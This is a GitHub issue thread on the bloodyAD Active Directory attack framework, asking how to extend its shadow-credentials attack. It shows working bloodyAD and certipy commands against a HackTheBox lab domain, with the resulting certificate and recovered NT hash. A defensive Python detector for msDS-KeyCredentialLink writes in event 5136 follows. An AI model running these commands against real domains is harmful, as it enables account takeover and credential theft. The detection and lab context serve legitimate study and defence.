CravateRouge / bloodyAD

BloodyAD is an Active Directory Privilege Escalation Framework
MIT License

Enhancement: shadowCredentials #48

Open 0xGreen opened 1 week ago

0xGreen commented 1 week ago

Wondering if it is possible to enhance the shadowCredential attack to remove the use of another tool?

bloodyAD -d absolute.htb --host dc.absolute.htb -k -u m.lovegod -p 'AbsoluteLDAP2022!' add shadowCredentials winrm_user
[+] KeyCredential generated with following sha256 of RSA key: 14835400bcc0ed3199d6b17edb829ef94c31fd45379028d3267d13ec6010465c
No outfile path was provided. The certificate(s) will be stored with the filename: FNoxGjcN
[+] Saved PEM certificate at path: FNoxGjcN_cert.pem
[+] Saved PEM private key at path: FNoxGjcN_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem FNoxGjcN_cert.pem -key-pem FNoxGjcN_priv.pem absolute.htb/winrm_user FNoxGjcN.ccache

So, the attack is a success but needs another tool, PKINITtools, to get the TGT.

If it is possible to implement something like what certipy did, it would be awesome; it performs the same attack and provides the TGT. (In the past, I guess PKINITtools was required for certipy as well.)

certipy shadow auto -target dc.absolute.htb -account winrm_user -k -u m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7'
[*] Adding Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2

CravateRouge commented 1 week ago

bloodyAD is specialized in Active Directory attacks while certipy is specialized in AD certificate attacks. That's why bloodyAD only does the first part of the exploit by writing into the AD and leaves the Kerberos part to another tool specialized for it.

But if you want to add this feature, feel free to add it. I would ask you not to include more dependencies than what bloodyAD already has (so no impacket dependency, only minikerberos).
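The "writing into the AD" half of the technique that the maintainer describes lands as a modification of the target's msDS-KeyCredentialLink attribute, and a domain controller with directory-service change auditing enabled records that write as Security event 5136. The script below is an added example written for this thread from the defender's side; it is not code from bloodyAD, certipy or either commenter. It decodes a 5136 event's AttributeValue, which carries a DN-Binary string wrapping a KEYCREDENTIALLINK_BLOB (MS-ADTS 2.2.20), and extracts the DeviceId and KeyID so they can be matched against the identifiers the tools print. The event field names follow the 5136 schema; the event, the blob (which contains no key material) and the object DN are constructed test data that reuse the identifiers shown in the issue, and the little-endian GUID layout for DeviceId is an assumption documented in the code.

```python
import struct
import uuid
import xml.etree.ElementTree as ET

# Entry identifiers of KEYCREDENTIALLINK_ENTRY (MS-ADTS 2.2.20.6)
KEY_ID = 0x01          # SHA-256 of the key material (the value bloodyAD prints)
KEY_USAGE = 0x04       # 0x01 = NGC (key-trust logon)
KEY_SOURCE = 0x05      # 0x00 = key stored in AD
DEVICE_ID = 0x06       # 16-byte GUID (the value certipy prints)
BLOB_VERSION = 0x200   # KEYCREDENTIALLINK_BLOB Version field

EVT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
OP_VALUE_ADDED = "%%14674"   # Event 5136 OperationType: "Value Added"


def parse_dn_binary(value):
    """Split a DN-Binary string 'B:<hex char count>:<hex>:<dn>' into (bytes, dn)."""
    parts = value.split(":", 3)
    if len(parts) != 4 or parts[0] != "B":
        raise ValueError("not a DN-Binary value")
    if int(parts[1]) != len(parts[2]):
        raise ValueError("DN-Binary length field does not match hex payload")
    return bytes.fromhex(parts[2]), parts[3]


def parse_key_credential(blob):
    """Walk the length/identifier/value entries of a KEYCREDENTIALLINK_BLOB."""
    if len(blob) < 4 or struct.unpack_from("<I", blob, 0)[0] != BLOB_VERSION:
        raise ValueError("missing or unexpected KEYCREDENTIALLINK_BLOB version")
    entries, pos = {}, 4
    while pos < len(blob):
        if pos + 3 > len(blob):
            raise ValueError("truncated entry header")
        length, ident = struct.unpack_from("<HB", blob, pos)
        pos += 3
        data = blob[pos:pos + length]
        if len(data) != length:
            raise ValueError("truncated entry value")
        entries[ident] = data
        pos += length
    info = {"key_id": entries.get(KEY_ID, b"").hex()}
    if len(entries.get(DEVICE_ID, b"")) == 16:
        # Assumption: DeviceId uses the Windows little-endian GUID byte layout.
        info["device_id"] = str(uuid.UUID(bytes_le=entries[DEVICE_ID]))
    if KEY_USAGE in entries:
        info["key_usage"] = entries[KEY_USAGE][0]
    return info


def detect_key_credential_write(event_xml):
    """Return an alert dict for a 5136 event adding an msDS-KeyCredentialLink value, else None."""
    root = ET.fromstring(event_xml)
    if root.findtext("e:System/e:EventID", namespaces=EVT_NS) != "5136":
        return None
    fields = {d.get("Name"): d.text for d in root.iterfind("e:EventData/e:Data", EVT_NS)}
    if fields.get("AttributeLDAPDisplayName") != "msDS-KeyCredentialLink":
        return None
    if fields.get("OperationType") != OP_VALUE_ADDED:
        return None
    blob, _dn = parse_dn_binary(fields["AttributeValue"])
    alert = {"subject": fields.get("SubjectUserName"), "object_dn": fields.get("ObjectDN")}
    alert.update(parse_key_credential(blob))
    return alert


def _entry(ident, value):
    return struct.pack("<HB", len(value), ident) + value


def build_sample_blob(device_id, key_id_hex):
    """Constructed KEYCREDENTIALLINK_BLOB for the sample event (test data, no key material)."""
    return (struct.pack("<I", BLOB_VERSION)
            + _entry(KEY_ID, bytes.fromhex(key_id_hex))
            + _entry(KEY_USAGE, b"\x01")
            + _entry(KEY_SOURCE, b"\x00")
            + _entry(DEVICE_ID, uuid.UUID(device_id).bytes_le))


SAMPLE_DN = "CN=winrm_user,CN=Users,DC=absolute,DC=htb"
_blob_hex = build_sample_blob("65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7",
                              "14835400bcc0ed3199d6b17edb829ef94c31fd45379028d3267d13ec6010465c").hex()

# Constructed Security event 5136 (not a captured log), reusing the identifiers printed in the issue.
SAMPLE_EVENT = f"""<Event xmlns="{EVT_NS['e']}">
  <System><EventID>5136</EventID></System>
  <EventData>
    <Data Name="SubjectUserName">m.lovegod</Data>
    <Data Name="ObjectDN">{SAMPLE_DN}</Data>
    <Data Name="ObjectClass">user</Data>
    <Data Name="AttributeLDAPDisplayName">msDS-KeyCredentialLink</Data>
    <Data Name="AttributeValue">B:{len(_blob_hex)}:{_blob_hex}:{SAMPLE_DN}</Data>
    <Data Name="OperationType">{OP_VALUE_ADDED}</Data>
  </EventData>
</Event>"""

if __name__ == "__main__":
    print(detect_key_credential_write(SAMPLE_EVENT))
```

Event 5136 is only emitted when the "Audit Directory Service Changes" subcategory is enabled and the user objects carry a SACL covering Write Property, so check both before relying on this. The detector flags only "Value Added" operations; a tool that restores the previous attribute afterwards, as the certipy output in the issue shows, produces a "Value Deleted" entry (OperationType %%14675) followed by another add, so a subject that writes the attribute of another account and then reverts it is a stronger signal than a single write.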